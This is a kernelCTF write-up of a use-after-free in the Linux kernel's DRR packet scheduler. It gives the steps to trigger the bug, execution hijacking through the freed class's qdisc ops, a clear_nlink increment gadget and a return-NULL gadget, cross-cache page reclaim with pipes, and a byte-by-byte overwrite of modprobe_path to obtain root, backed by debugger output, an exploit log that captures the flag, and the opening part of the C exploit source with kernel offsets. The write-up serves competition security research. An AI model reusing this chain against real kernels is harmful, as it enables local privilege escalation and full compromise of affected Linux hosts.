[   26.108812]  qdisc_tree_reduce_backlog+0xf6/0x1f0
[   26.109827]  drr_delete_class+0x16e/0x2a0

We finally have a UAF and it happens when you go to delete class 1:1. So the PoC was entirely correct the whole time, and it was my bad kernel config and my assumptions about what must be happening (an impossible UAF on the qdisc) that led me astray for so long. As you can see from the backtrace, we know this code path well. This is the exact code path that leads to the initial list del bug we encountered when we were deleting class 1:3.

So now everything clicked for me. When we delete class 1:1 it is trying to unlink its alist list_head from the drr scheduler’s active list and when it does its list_del sanity checks, it’s accessing the freed 1:3 class’s list_head that remains in the active list even though we destroyed class 1:3. This is because we never removed it from the active list, the list_del we attempted tried to unlink class 3:1’s list_head instead. So this is where the UAF access comes from.

So now can we reason about how to exploit the UAF. From here, I created a similar PoC in my exploit just to make sure I had the right constituent parts but was able to reduce the complexity a bit because in hindsight, the bug is quite simple once you understand all of the moving parts. There are aspects of my exploit setup that are not strictly required, but keeping it relatively close to the PoC helped me initially and then I just left the code in there.

Here are the steps I followed to trigger the bug:

Create a root qdisc for the loopback interface that is of type drr
Create class 1:1 of type drr
Create class 1:3 of type drr
Assign a plug qdisc to class 1:1
Assign a pfifo (default type) qdisc to 1:3, this will be our reparented buggy qdisc later
Create class 1:2 of type drr and reparent 1:3’s qdisc to 1:2, triggering the bug
Enqueue packets in 1:1 and 1:2, this will place 1:1 and 1:2 class alist list_head nodes in the scheduler’s active list
Delete class 1:1, I do this first because it will require sane list_head values for class 1:2 when it removes itself from the active list
Delete class 1:2, this will fail to remove 1:2’s list_head from the active list but will free the class
?? Profit

So now we have to find out how the active list is used so that we can see how we can access our freed class that has a reference cached in the active list. A quick grep for active in sch_drr.c will lead you to drr_dequeue:

static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))	// [1]
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist); // [2]
		skb = cl->qdisc->ops->peek(cl->qdisc); // [3]
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}

		len = qdisc_pkt_len(skb);
		if (len <= cl->deficit) {
			cl->deficit -= len;
			skb = qdisc_dequeue_peeked(cl->qdisc);
			if (unlikely(skb == NULL))
				goto out;
			if (cl->qdisc->q.qlen == 0)
				list_del(&cl->alist);

			bstats_update(&cl->bstats, skb);
			qdisc_bstats_update(sch, skb);
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
			return skb;
		}

		cl->deficit += cl->quantum;
		list_move_tail(&cl->alist, &q->active);
	}
out:
	return NULL;
}

[1]: This function gets invoked whenever a packet is received on the root drr qdisc’s interface and the way the drr algorithm works is it looks through its active packet flows and tries to dequeue packets based on the requirements of each active class. It first checks to make sure there are actually active classes on the scheduler’s active list. Our buggy class is on the active list thankfully because of class 1:1 making sure that no packets are dequeued by virtue of its plug qdisc. So tip of the cap to the patch author and Lion Ackermann, thank you!
[2]: In a while loop, we first get a handle to the first struct drr_class on the active list. Since we deleted class 1:1 who had packets enqueued in its plug qdisc first, this first class should be our UAF class
[3]: This is is what caught my eye, since we have a UAF on cl, we potentially can hijack RIP here since we can possibly control the entirety of cl->qdisc->ops->peek() and replace peek() with a function of our choice

Now it was time to develop an exploit plan.

Exploit Plan

Seeing that we invoke cl->qdisc->ops->peek(), I was confident that I could hijack execution. This turned out to be entirely true, at this point I told some friends that all I had to do was some ROP and I’d be on my way to capturing the flag. This turned out to be entirely false and completing the exploit was a lot more difficult than I anticipated. The main issue I had trying to ROP was that I couldn’t find a stack-pivot gadget that worked with our register control at the time that we hijack execution in order for us to start ROP’ing:

$rax   : 0xffffffff81356310					// [1]
$rbx   : 0xffff88800f295bd0					// [2]
$rcx   : 0x20000           
$rdx   : 0x0               
$rsp   : 0xffffc9000188baf0
$rbp   : 0xffff888006d19e00
$rsi   : 0x0               
$rdi   : 0xffffffff84267b88					// [3]
$rip   : 0xffffffff81d71bd8
$r8    : 0x1               
$r9    : 0xffffc9000188bb90
$r10   : 0xffff88800f2719e0
$r11   : 0xffff888006b6a660
$r12   : 0xffff888006d19f40
$r13   : 0x0               
$r14   : 0xffff888006d19e00
$r15   : 0xffff888006d19e00
$eflags: [zero CARRY parity adjust SIGN trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x10 $ss: 0x18 $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff81d71bcc  mov    rdi, QWORD PTR [rbx+0x10]
   0xffffffff81d71bd0  mov    rax, QWORD PTR [rdi+0x18]
   0xffffffff81d71bd4  mov    rax, QWORD PTR [rax+0x38]
 → 0xffffffff81d71bd8  call   rax

Here I’m showing you the GDB output when we we’re about to call rax which is when we call the peek that we hijack. We have the following register control:

[1]: rax ends up being the function address we want to call, so any ROP stack pivot that utilizes rax would be self-referential in a way that made it difficult to find an appropriate gadget
[2]: rbx ends up being an address inside our UAF class. This is great for us as this could represent a way to stack-pivot since we control the contents around this address; however, I was unable to find any stack pivot gadgets that help us here
[3]: rdi ends up being the address of the UAF class’s qdisc. Again, this would great for us because we control this memory but I was unable to find an appropriate stack pivot gadget

To be quite honest, I didn’t spend too much time trying to make ROP work, there were perhaps gadgets or strategies that I didn’t think of or consider that would’ve enabled me to use ROP but I gave up pretty quickly, probably a couple hours or so of looking. I figured with our precise control over rdi and the fact that we have what amounts to an arbitrary function call primitive, I felt like there had to be gadgets (single function calls) we could leverage to capture the flag.

First thing is first, I knew from other entries and players that I didn’t really have to worry about KASLR as a barrier, because I could always just use the Entrybleed side-channel, so I didn’t invest any time in trying to think of other ways to defeat KASLR. There was also the possibility that we use the WARN() splat from the invalid list_del which ends up showing us register values containing heap pointers, our PID (on COS instances we spawn inside a namespace jail and we don’t know our real pid), and a kernel text pointer that could be used to defeat KASLR. I thought this was sort of inelegant but never crossed it off my list of possibilities. Luckily I was able to complete the exploit without resorting to this.

With that settled, I moved onto what we should do to refill the freed class so that we could control what function is called. I identified the nft_table->udata field as a nice elastic object that is 100% user-controlled back in around 2023 that could be used as a refill object for kmalloc slab caches up to kmalloc-256, but never got the chance to use it. Kernel devs eventually turned this allocation into a GFP_KERNEL_ACCOUNT allocation, so it can’t be used any more if the slab caches are separate to replace general kmalloc-128 objects like our class. But on the Google COS instance which runs a 5.15.173+ kernel, the allocation was non-accounted so I decided to use it.

With this refill object, we can now fake 100% of the UAF class, which is obviously helpful. The problem is that due to the multiple pointer dereferences in the indirect call to cl->qdisc->ops->peek, we also need to control data at a known location from the kernel base. I first looked for an opportunity to use RetSpill to smuggle user controlled values into my kernel stack, but we end up in our gadget via a sendto syscall which unfortunately doesn’t happen to spill any user values onto the kernel stack, at least from what I could tell. Next I settled on using the kernfs_pr_cont_buf, which I learned about in the kCTF Discord from @roddux. They had read this writeup which contained the details. Basically, if your kernel has CONFIG_NETFILTER_XT_MATCH_CGROUP, which kCTF instances do, then you can store up to PATH_MAX user controlled data a known offset from the kernel base. This is insane actually and makes exploitation so much easier. The best part is the data there is very mutable, you can just keep resetting its contents. You can accomplish this by establishing an iptables match rule on a cgroup file path, and the file path gets stored as data in the buffer. The only catch is that the buffer is meant to store a path name, thus, any NULL could terminate your data buffer. So this is something I had to account for in my exploit.

Now we seemingly had everything we needed to explore what function to call. We had our fake class which was in nft_table->udata and our fake qdisc and its ops table at a known address in kernfs_pr_cont_buf. The next thing I wanted to accomplish at this point was to determine what side-effects hijacking execution here brought with it. So I used our function call primitive to just call a ret gadget, and see where we end up. We immediately blow up in drr_dequeue for a few reasons:

static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist);
		skb = cl->qdisc->ops->peek(cl->qdisc);				// [1]
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}

		len = qdisc_pkt_len(skb);					// [2]
		if (len <= cl->deficit) {					// [3]
			cl->deficit -= len;					// [4]
			skb = qdisc_dequeue_peeked(cl->qdisc);			// [5]
			if (unlikely(skb == NULL))
				goto out;					// [6]
			if (cl->qdisc->q.qlen == 0)
				list_del(&cl->alist);

			bstats_update(&cl->bstats, skb);
			qdisc_bstats_update(sch, skb);
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
			return skb;						// [7]
		}

		cl->deficit += cl->quantum;
		list_move_tail(&cl->alist, &q->active);				// [8]
	}
out:
	return NULL;
}

Once we call our simple ret gadget during our experiment we return to [1] where the return value is interpreted as a pointer to a sk_buff. This could be a problem for us because whatever gadget we use could do something with the return value that is supposed to be stored in rax. In our experiment, our function doesn’t touch rax, we just return, so rax still points to a function address. So it definitely isn’t NULL. Since it’s not NULL we progress to [2], this ends up being something like a read of skb field value, like a skb->len, so this will return a value from reading executable text in our case, because rax is a function address. At [3] we see that if that value it reads from the kernel text is less than or equal to our fake class deficit value, we enter this if statement body at [4]. Here, we are actually decrementing a value in our fake class, so this will write to our nft_table->udata refill object. That is notable because that is an immutable refill object, once we refill (allocate it) we have no way of resetting/changing its contents. We then see a call to qdisc_deqeueue_peeked in [5], which we will get into in a second, and if that returns NULL, we can escape this hell-hole of a function at [6]. Separately, if we make it to [7], which would incur several memory accesses to our fake qdisc, we return a non-NULL pointer value. My goal from the start was that if we were to restore execution gracefully and as simply as possible, we would be required to return NULL from this function so that the calling function had nothing to do with the results of our hijacked execution. We can see even more list manipulation at [8] so I wanted to avoid this at all costs.

Let’s then go check on the call to qdisc_dequeue_peeked which takes a pointer to our fake qdisc as its argument in [5]:

/* use instead of qdisc->dequeue() for all qdiscs queried with ->peek() */
static inline struct sk_buff *qdisc_dequeue_peeked(struct Qdisc *sch)
{
	struct sk_buff *skb = skb_peek(&sch->gso_skb);			// [1]

	if (skb) {							// [2]
		skb = __skb_dequeue(&sch->gso_skb);
		if (qdisc_is_percpu_stats(sch)) {
			qdisc_qstats_cpu_backlog_dec(sch, skb);
			qdisc_qstats_cpu_qlen_dec(sch);
		} else {
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
		}
	} else {
		skb = sch->dequeue(sch);				// [3]
	}

	return skb;
}

We see that we get a pointer to another sk_buff by calling skb_peek() on the gso_skb field of our fake qdisc. This is good news for us, because that means that this outcome is probably somewhat controllable for us since we control the entirety of the fake qdisc. We’ll examine skb_peek() in a second. If we return a non-NULL socket buffer from skb_peek, we then go on to call __skb_dequeue with the pointer to gso_skb and it goes on to do more list manipulation and memory accesses on the fake qdisc. This looked very unattractive to me compared to yet another indirect function call in sch->deuque(sch) which we should be able to again hijack because we control the fake qdisc. So at this point I’m thinking:

We hijack execution in two places: once in drr_dequeue and once in qdisc_dequeue_peeked
We can use the first hijacking to do something useful
We can use the second hijacking to restore execution in some way gracefully

So the first thing I tried was killing my task in the first hijacking spot just to make sure it was possible to do. I tried a few tricks that other players have used and ended up trying use do_exit as the way to kill my task which is whatever task I use to send a packet to the loopback interface which triggers the call to drr_dequeue. The problem is that I hit this code block:

if (unlikely(in_interrupt()))
		panic("Aiee, killing interrupt handler!");

This means that we hijack execution in an interrupt context, likely from the interrupt caused by the loopback interface receiving a packet. So these types of tricks that typically apply to a normal process context don’t apply here, and I don’t have powerful enough primitives (we’re just limimted to two function calls, not a full ROP chain) to remove my task from an interrupt context. So my plan was to just exit the dequeue function normally by returning NULL if possible.

To see if this is feasible, we need to see where and how we can reach the sch->dequeue inside of qdisc_dequeue_peeked which is our 2nd hijack spot. We need skb_peek(&sch->gso_skb) to return NULL:

static inline struct sk_buff *skb_peek(const struct sk_buff_head *list_)
{
	struct sk_buff *skb = list_->next;

	if (skb == (struct sk_buff *)list_)
		skb = NULL;
	return skb;
}

Turns out this is just a simple check to see if a list head element points to itself, indicating that the list is empty. We can actually do this because we control the fake qdisc. So as long as at the offset for &sch->gso_skb the value there points its own address, we can return a NULL from this function. That lands us right into sch->dequeue, our 2nd hijack spot. Our goal is to have qdisc_dequeue_peeked return NULL, so we need this arbitrary function call to return NULL or 0. So now we need two gadgets or function calls:

A function call that does something useful with our control over rdi
A function call that simply returns NULL or 0 to restore execution gracefully within drr_dequeue

Gadget Hunting

I assumed finding the 2nd gadget would be easy, a function call that simply returns 0 or NULL; however, it still took me some time to find. The first thought I had was let’s just find a function like this:

void function(struct foo *obj) {
	return obj->field;
}

This would be easy, we control the entirety of the memory pointed to by struct foo * and we can just simply read a field that returns 0. But then I remembered that I can’t really have NULL values in my kernfs_pr_cont_buf because its interpreted as a path name when it’s sent. So I skipped this idea. What would be even better is a function like this:

void function(struct foo *obj) {
	return obj->field->val;
}

This would be perfect, we could just have field point to something that is guaranteed to be 0, such as the end of our kernfs_pr_cont_buf where a NULL value is no issue. I found just that in this function:

static unsigned int
sch_frag_dst_get_mtu(const struct dst_entry *dst)
{
	return dst->dev->mtu;
}

So now we have our “return NULL gadget” and it was time to find our “do something useful gadget”. I played around with the idea for a long time of using this first hijack spot to perform an arbitrary free to upgrade our limited class UAF to something more useful, a more generalized UAF. I would need something like this probably:

void function(struct foo *obj) {
	kfree(obj->ptr);
	return;
}

I quickly abandoned this idea though because I didn’t have a leaked heap pointer to point the kfree at, I didn’t want to resort to using leaked pointers from our WARN() splat because it felt like cheating. So then I became determined to find an arbitrary write gadget. With the arbitrary write gadget, I would be able to overwrite modprobe_path to point to a file I control and read the flag from the container host. This has been done in numerous wasy in the kCTF program so I knew it was feasible. Now began the hard work of finding a write gadget.

Finding an Arbitrary Write Function

Finding the write function took me a very long time. I was looking for a function that took a single pointer argument and derived a write from its contents, I was looking for something like this:

void function(struct foo *obj) {
	u64 *location = obj->field;
	*location = obj->value;
}

This would derive both the “what” and the “where” in the write from rdi which we control as our fake qdisc. To start searching I just started thinking about what data structures in the kernel are humongous and often self-contained logic-wise, ie, likely to passed to a function by themselves. I narrowed my search down to the following structure types: socket buffers, files, directory entries, inodes, and a few others. Cycling through these subsystems and grepping for patterns, I eventually found this function:

void clear_nlink(struct inode *inode)
{
	if (inode->i_nlink) {
		inode->__i_nlink = 0;
		atomic_long_inc(&inode->i_sb->s_remove_count);
	}
}

This fits our needs perfectly, if a field in the passed in inode is not NULL, which we prefer, then increment the value at inode->i_sb->s_remove_count as if its a u64 value. An increment is a type of limited write primitive, we’re able to target a single byte at a time with this primitive and increment it until it reaches a desired value and then we can move onto the next byte. So my goal became:

Use the increment primitive to increment the first character of /sbin/modprobe in kernel memory
Use the return NULL hijack to exit gracefully from drr_dequeue
Send another packet to repeat until /sbin/modprobe is overwritten to something we control

One iteration of this worked perfect, and I was able to check after the iteration and see that /sbin/modprobe had become 0sbin/modprobe in memory. So the concept worked, but now we have other problems, we need to execute this code path dozens of times because we need to do a lot of incrementing. We want /sbin/modprobe to become something like /proc/500/fd/3 where pid 500 is a pid of ours and fd 3 is a privilege escalation script that gets executed when the kernel tries to invoke the modprobe_path.

So let’s revisit drr_dequeue and identify the spots that cause problems:

static struct sk_buff *drr_dequeue(struct Qdisc *sch)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl;
	struct sk_buff *skb;
	unsigned int len;

	if (list_empty(&q->active))
		goto out;
	while (1) {
		cl = list_first_entry(&q->active, struct drr_class, alist);
		skb = cl->qdisc->ops->peek(cl->qdisc);				
		if (skb == NULL) {
			qdisc_warn_nonwc(__func__, cl->qdisc);
			goto out;
		}

		len = qdisc_pkt_len(skb);					// [1]
		if (len <= cl->deficit) {					// [2]
			cl->deficit -= len;					// [3]
			skb = qdisc_dequeue_peeked(cl->qdisc);			
			if (unlikely(skb == NULL))
				goto out;					
			if (cl->qdisc->q.qlen == 0)
				list_del(&cl->alist);

			bstats_update(&cl->bstats, skb);
			qdisc_bstats_update(sch, skb);
			qdisc_qstats_backlog_dec(sch, skb);
			sch->q.qlen--;
			return skb;						
		}

		cl->deficit += cl->quantum;
		list_move_tail(&cl->alist, &q->active);				
	}
out:
	return NULL;
}

To execute this code path over and over, we need to make sure we always enter the if statement body. So we always need len <= cl->deficit to be true. Remember that len is derived from reading a value at some offset in the kernel text next to our arbitrary write gadget address, so we have 0 control over this value that is returned. But we do control cl->deficit with our nft_table->udata, so we can make sure that is always 0xffffffff. Awesome, we’re good to go. Nope, at [3] that value is decremented in place by len, so that memory is access and written to. This is a big problem for me, nft_table->udata is immutable, I have no way of updating that value to reset it.

At this point, I realized I’d have to completely redo my strategy for refilling the UAF class. I should’ve done this from the beginning but I was so stupidly attached to this idea of using nft_table->udata because I had discovered it independently a couple years ago and had some weird sense of pride in being able to finally use it. I decided to get the entire victim class object page sent back to the page allocator and reclaim the page with a pipe buffer page backing as I had done previously in my last kCTF exploit. This would give me mutable memory that I could reset every iteration.

But there was also another detail in the path in our write gadget:

void clear_nlink(struct inode *inode)
{
	if (inode->i_nlink) {
		inode->__i_nlink = 0;
		atomic_long_inc(&inode->i_sb->s_remove_count);
	}
}

This gadget NULLs out the value at inode->__i_nlink and we require that value to be non-NULL in order to do the increment. So this would have to be reset as well. Ontop of that, we also need to slide the write-target as we succesfully increment each character of /sbin/modprobe until its /proc/500/fd/3. So we’ll need to reset the kernfs_pr_cont_buf memory each iteration as well, which is not as big of a deal since that is easily doable with iptables.

So now the exploit plan was clear:

Increment a single byte of the modprobe_path string
Reset the page backing of all of the pipes we have allocated pages for, one of them has reclaimed our freed page containing the victim UAF class, so that we can update cl->deficit to 0xffffffff
Reset the kernfs_pr_cont_buf contents to give inode->i_nlink a non-NULL value
Possibly reset the target pointed to by s_remove_count if we have incremented the current character enough in the modprobe_path string
Repeat until finished

Putting It All-Together

Instead of messing with any arithmetic for determining how to increment each /sbin/modprobe byte until it becomes /proc/500/fd/3, I just simulated each write in my exploit program. So I created a local copy of /sbin/modprobe and a local copy of /proc/500/fd/3 and I simulated the increment logic one iteration at a time, making sure to actually execute the increment in kernel space as well. This way, I could basically just do the increment blind and know when it was done without doing any arithmetic really. Probably better ways to do this, but this was my first idea and it worked really well for me. This actually worked first try and I successfully got /sbin/modprobe changed to /proc/500/fd/3.

In the namespace jail, you don’t know your pid ahead of time so I had to use a trick suggested in the kCTF discord by @pqlpql a while ago which is to just spray a certain amount of child processes and guess a pid which is likely one of those children. This is very simple and clever and works very well because when you get a shell on the kCTF COS instance, we are using a fresh-boot so pids are very predictable. I found that spraying 500 child pids would reliably mean that pid 500 would be one of your children processes.

Using this, at the beginning of our exploit we just need the sprayed children to open a privesc script that will be run with kernel privileges so that their /proc/self/fd/3 would be the privesc script. And to read the flag I basically just made the script do: cat /flag > /proc/500/fd/0 and had all of the children do blocking reads on their STDIN file descriptors. Whoever is pid 500 would print the flag contents to the terminal and it worked first try:

[>] Dropping scripts...
[>] Spraying child pids...
[>] Kernel base address: 0xffffffffa6000000
[>] Kernfs buffer address: 0xffffffffa9267b80
[>] Arbitrary write gadget address: 0xffffffffa6356310
[>] Modprobe path address: 0xffffffffa8662e80
[>] Return NULL gadget address: 0xffffffffa6d4ab80
[>] Doing the unshare...
[>] Bringing up lo interface...
[>] Pinning our process to core-0...
[>] Starting UDP listener...
[>] Creating pipes...
[>] Setting up initial classes...
[>] Creating root qdisc...
[>] Creating class 1:1...
[>] Creating class 1:3...
[>] Assigning plug qdisc to class 1:1...
[>] Assigning pfifo qdisc to class 1:3...
[>] Executing cross-cache stage-1...
[>] Executing cross-cache stage-2...
[>] Allocating victim class 1:2...
[>] Executing bug to reparent qdisc to 1:2 from 1:3...
[>] Displaying hierarchy setup...
class drr 1:1 root leaf 2: quantum 64Kb 
class drr 1:2 root leaf 3: quantum 64Kb 
class drr 1:3 root leaf 3: quantum 64Kb 
qdisc drr 1: dev lo root refcnt 2 
qdisc plug 2: dev lo parent 1:1 
qdisc pfifo 3: dev lo parent 1:3 refcnt 2 limit 1000p
[>] Enqueueing packets in 1:1 and 1:2...
[   10.508490] drr_dequeue: plug qdisc 2: is non-work-conserving?
[>] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...
[   10.519000] ------------[ cut here ]------------
[   10.521778] list_del corruption, ffff8fdd50a008d0->next is NULL
[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #1
[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
[   10.600704]  
[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
[   10.699977]  
[   10.701360] ---[ end trace 8e001f66f1703586 ]---
[>] Executing cross-cache stage-4...
[>] Executing cross-cache stage-5 and reclaiming page...
[>] Overwriting modprobe path...
[   11.859455] xt_cgroup: invalid path, errno=-2
[   11.864787] xt_cgroup: invalid path, errno=-2
[   11.869782] xt_cgroup: invalid path, errno=-2
[   11.874720] xt_cgroup: invalid path, errno=-2
[   11.879548] xt_cgroup: invalid path, errno=-2
[   11.884427] xt_cgroup: invalid path, errno=-2
[   11.889362] xt_cgroup: invalid path, errno=-2
[   11.894300] xt_cgroup: invalid path, errno=-2
[   11.899125] xt_cgroup: invalid path, errno=-2
[   11.904009] xt_cgroup: invalid path, errno=-2
[   16.861299] cgroup_mt_check_v2: 2317 callbacks suppressed
[   16.861303] xt_cgroup: invalid path, errno=-2
[   16.869908] xt_cgroup: invalid path, errno=-2
[   16.875051] xt_cgroup: invalid path, errno=-2
[   16.880257] xt_cgroup: invalid path, errno=-2
[   16.885424] xt_cgroup: invalid path, errno=-2
[   16.890615] xt_cgroup: invalid path, errno=-2
[   16.896175] xt_cgroup: invalid path, errno=-2
[   16.901367] xt_cgroup: invalid path, errno=-2
[   16.906582] xt_cgroup: invalid path, errno=-2
[   16.911806] xt_cgroup: invalid path, errno=-2
[>] Modprobe path is *probably* overwritten lol!
kernelCTF{v1:cos-105-17412.535.34:SNIPPED}
./trigger.sh: 1: ����: not found
user@cos-105-17412:/tmp$ ^C

Thanks && Misc

Huge thanks to all the kCTF moderators like Jordy and KT who answer all my questions and are very charitable. Also big thanks to my friends Chompie and Firzen for being my sounding board and supportive. Also thanks to Pumpkin for always helping me and answering DMs.

The exploit has some artifacts in it still that are there because I did initial development work on a 6.* kernel version and then switched to a kCTF bzImage which is kernel version 5.*, there is also all of the nftables code in the exploit still for spraying tables with userdata, I just kept that code in there to do the kmalloc-128 page reservation required to get my victim page sent back to the allocator. In a way, I did finally get to use table->udata.

Exploit

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#include 
#include 
#include 
#include  

// Kernel base address
uint64_t g_kernel_base = 0;

// Address of kernfs_pr_cont_buf
uint64_t g_kernfs_addr = 0;

// Address of the offset from kernel base for kernfs_pr_cont_buf
uint64_t kernfs_addr_off_6 = 0x3691a80;
uint64_t kernfs_addr_off_5 = 0x3267b80;

// Offset for entry_SYSCALL_64_offset
uint64_t g_entry_syscall_off = 0;

// Based on kernel version
uint64_t entry_syscall_off_6 = 0x1400040;
uint64_t entry_syscall_off_5 = 0x1200080;

// Our arbitrary write gadget clear_nlink
uint64_t g_write_gadget_addr = 0;

// Based on kernel version
uint64_t write_gadget_off_5 = 0x356310;
uint64_t write_gadget_off_6 = 0;

// Modprobe path addr
uint64_t g_modprobe_addr = 0;

// Based on kernel version 
uint64_t modprobe_off_5 = 0x2662e80;
uint64_t modprobe_off_6 = 0;

// A mutable write target that we use to overwrite modprobe one byte at a time
uint64_t g_write_target = 0;

// Our Return NULL gadget
uint64_t g_null_gadget_addr = 0;

// Based on kernel version
uint64_t null_gadget_off_5 = 0xd4ab80;
uint64_t null_gadget_off_6 = 0;

// We target [rax + 0x450] with our gadget, so we subtract this from the ptr
// value in our fake buffer
#define WRITE_TARGET_OFFSET 0x450UL

// Pin our process (and children from system() / fork()) to core-0
void pin_to_core_0() {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(0, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) < 0) {
        perror("sched_setaffinity");
        exit(-1);
    }
}

// Write to a file so we can set our user ids
int write_mapping(const char *path, const char *content) {
    int fd = open(path, O_WRONLY);
    if (fd == -1) {
        printf("Failed to open %s: %s\n", path, strerror(errno));
        return -1;
    }
    
    if (write(fd, content, strlen(content)) != strlen(content)) {
        printf("Failed to write to %s: %s\n", path, strerror(errno));
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

// Unshare our namespaces so that we can get the caps we want
void unshare_stuff(void) {
    // Unshare into new user namespace
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == -1) {
        printf("unshare failed: %s\n", strerror(errno));
        exit(-1);
    }

    // First disable setgroups
    if (write_mapping("/proc/self/setgroups", "deny") == -1) {
        printf("Failed to disable setgroups\n");
        exit(-1);
    }

    // Then map our UID and GID
    if (write_mapping("/proc/self/uid_map", "0 1000 1") == -1 ||
        write_mapping("/proc/self/gid_map", "0 1000 1") == -1) {
        printf("Failed to write ID mappings\n");
        exit(-1);
    }

    // Bring up the loopback interface
    printf("[>] Bringing up lo interface...\n");
    if (system("./ip.bin link set lo up") != 0) {
        printf("Failed to bring up loopback interface.\n");
        exit(-1);
    }
}

// Start listener
void start_udp_listener(void) {
    system("nohup ./socat.bin -u UDP-RECV:8888 STDOUT >/dev/null 2>&1 &");
}

#define PIPE_MAX 32
#define PIPE_READ 0
#define PIPE_WRITE 1

// An array to hold pipe fds
int g_pipes_arr[PIPE_MAX][2];

// Allocate pipes 
void allocate_pipes(void) {
    for (int i = 0; i < PIPE_MAX; i++) {
        if (pipe(g_pipes_arr[i]) == -1) {
            perror("pipe");
            exit(-1);
        }
    }
}

// Attempt to reclaim our page by allocating pages to back the pipes
void reclaim_page(void) {
    char write_buf[4096] = { 0 };
    memset(&write_buf[0], 'B', 4096);

    for (int i = 0; i < PIPE_MAX; i++) {
        write(g_pipes_arr[i][PIPE_WRITE], write_buf, 4096);
    }
}

#define NUM_SPRAY_OBJS 4096UL
#define USERDATA_SIZE 128UL
